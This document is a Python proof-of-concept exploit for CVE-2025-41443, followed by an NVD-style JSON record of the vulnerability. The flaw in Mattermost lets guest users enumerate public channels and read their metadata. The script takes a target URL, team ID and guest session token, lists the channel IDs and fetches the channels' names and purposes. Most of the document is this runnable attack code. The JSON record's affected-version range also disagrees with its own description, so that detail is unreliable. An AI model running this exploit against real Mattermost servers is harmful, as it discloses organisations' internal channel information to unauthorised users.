CVE-2025-41443

#!/usr/bin/env python3 """ CVE-2025-41443 - Mattermost Guest User Channel Information Disclosure PoC This PoC demonstrates how a guest user can enumerate public channels via the /api/v4/teams/{team_id}/channels/ids endpoint due to improper permission validation. """ import requests import json import sys class MattermostGuestExploit: def __init__(self, base_url, team_id, session_token): """ Initialize the exploit with target Mattermost server details. :param base_url: Base URL of the Mattermost server (e.g., https://mattermost.example.com) :param team_id: The team ID the guest user belongs to :param session_token: Authentication token (cookie or bearer token) for the guest account """ self.base_url = base_url.rstrip('/') self.team_id = team_id self.headers = { 'Authorization': f'Bearer {session_token}', 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (compatible; SecurityResearch/1.0)' } def list_team_channels(self): """ Exploit the vulnerable endpoint to list all public channels in the team. Normally, guest users should only see channels they are members of, but due to CVE-2025-41443, they can enumerate all active public channels. """ endpoint = f"{self.base_url}/api/v4/teams/{self.team_id}/channels/ids" print(f"[*] Targeting endpoint: {endpoint}") print(f"[*] Sending request as guest user...") try: response = requests.get(endpoint, headers=self.headers, timeout=10) if response.status_code == 200: channels = response.json() print(f"[+] SUCCESS: Retrieved {len(channels)} channel(s)!") print("\n[*] Discovered Channel IDs:") for idx, channel_id in enumerate(channels, 1): print(f" {idx}. {channel_id}") # Optionally fetch detailed info for each channel return channels elif response.status_code == 401: print("[-] Authentication failed. Check your session token.") elif response.status_code == 403: print("[-] Access forbidden. The server may be patched.") else: print(f"[-] Unexpected status code: {response.status_code}") print(f" Response: {response.text}") return None except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return None def get_channel_details(self, channel_id): """ Fetch additional metadata for a discovered channel. """ endpoint = f"{self.base_url}/api/v4/channels/{channel_id}" try: response = requests.get(endpoint, headers=self.headers, timeout=10) if response.status_code == 200: return response.json() except requests.exceptions.RequestException: pass return None def main(): if len(sys.argv) != 4: print(f"Usage: {sys.argv[0]} <base_url> <team_id> <session_token>") print(f"Example: {sys.argv[0]} https://mm.example.com abc123xyz cookie_value_or_token") sys.exit(1) base_url = sys.argv[1] team_id = sys.argv[2] session_token = sys.argv[3] print("=" * 70) print("CVE-2025-41443 - Mattermost Guest Channel Disclosure PoC") print("Affected: Mattermost 10.5.x <= 10.5.12, 10.11.x <= 10.11.2") print("=" * 70) exploit = MattermostGuestExploit(base_url, team_id, session_token) channels = exploit.list_team_channels() if channels: print("\n[*] Attempting to fetch metadata for discovered channels...") for ch_id in channels[:5]: # Limit to first 5 to avoid noise details = exploit.get_channel_details(ch_id) if details: print(f"\n Channel: {details.get('display_name', 'N/A')}") print(f" Type: {details.get('type', 'N/A')}") print(f" Purpose: {details.get('purpose', 'N/A')}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-41443", "sourceIdentifier": "[email protected]", "published": "2025-10-16T08:15:35.917", "lastModified": "2025-10-29T08:15:30.493", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 10.5.x <= 10.5.12, 10.11.x <= 10.11.2 fail to properly validate guest user permissions when accessing channel information which allows guest users to discover active public channels and their metadata via the `/api/v4/teams/{team_id}/channels/ids` endpoint"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0", "versionEndExcluding": "10.5.11", "matchCriteriaId": "9A7F5FBF-4910-4376-96DF-0549BA5259AE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.3", "matchCriteriaId": "D4B91178-97CA-4799-A853-685F04C33F9E"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}